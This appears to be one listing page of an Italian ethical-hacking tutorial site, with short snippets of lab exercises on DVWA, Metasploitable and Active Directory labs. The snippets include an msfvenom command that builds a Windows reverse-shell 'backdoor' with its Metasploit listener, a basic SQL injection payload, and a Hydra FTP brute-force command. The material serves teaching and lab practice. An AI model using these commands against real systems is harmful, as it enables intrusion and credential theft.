Quanto tempo serve per violare una password semplice?
Molte persone usano password basate su parole di senso compiuto, nomi o date di nascita. Questo le rende estremamente vulnerabili, anche se la password ha 6–8 caratteri.
Vediamo due esempi concreti:
Recuperare la password di un PDF con John the Ripper
John the Ripper è uno strumento open source per il recupero di password e il test di robustezza delle credenziali. In questo esempio vedremo come usarlo per recuperare la password di un file PDF protetto, in modo legale ed etico.
Bypass di WAF con Obfuscazione SQLi
Obiettivo: Eseguire una SQL Injection avanzata bypassando un Web Application Firewall (WAF).
Ambiente:
DVWA (Damn Vulnerable Web App) con ModSecurity attivo.
Tecniche utilizzate:
Commenti SQL (
/**/)
Attacco a Kerberos (Golden Ticket Attack)
Obiettivo: Ottenere un Golden Ticket per impersonare un amministratore di dominio in un ambiente Active Directory.
Strumenti necessari:
Impacket (su Kali Linux)
Mimikatz (su Windows)
Active Directory lab (es. Windows Server 2019 + Windows 10 client)
Exploit di un Buffer Overflow in un Servizio Windows (SLMail)
Strumenti necessari:
Immunity Debugger (Windows)
Kali Linux (per generare l’exploit)
Mona.py (plugin per Immunity Debugger)
Metasploit Framework
Come creare una Backdoor con Msfvenom
Genera un payload per Windows con
msfvenom(parte di Metasploit):msfvenom -p windows/meterpreter/reverse_tcp LHOST=<tuo-IP> LPORT=4444 -f exe > backdoor.exeAvvia un listener su Kali Linux con Metasploit:
msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST <tuo-IP>set LPORT 4444exploit
Analisi di un Malware con Strings
Scarica un file sospetto (es. da MalwareBazaar, solo per scopi didattici!).
Esegui:
strings <nome-file> | lessCerca indirizzi IP, URL, comandi sospetti o altre informazioni.
SQL Injection Base
Usa DVWA (Damn Vulnerable Web App) su Metasploitable.
Procedura:
Accedi a DVWA (
http://<indirizzo-IP-target>/dvwa) e loggati.Vai alla sezione "SQL Injection".
Inserisci nel campo di input:
' OR '1'='1
Bruteforce su FTP con Hydra
Assicurati di avere un server FTP vulnerabile (es. su Metasploitable).
Crea o scarica una wordlist (es.
rockyou.txtsu Kali Linux).Esegui Hydra:
hydra -l <username> -P <percorso-wordlist> ftp://<indirizzo-IP-target>Se il login ha successo, prova ad accedere manualmente con:
Vedere porte e servizi aperti su una macchina da attaccare
Innanzitutto è sempre utile richiamare due principi di base:
l'esercizio è solo ad uso didattico
deve essere effettuato sempre su una nostra macchina virtuale
Dopo aver avviato la macchina virtuale:
troviamo il suo IP con il comando
ip routeo se vuoi più dettagliip addr show
Paginazione
- Pagina precedente
- Pagina 3
- Pagina successiva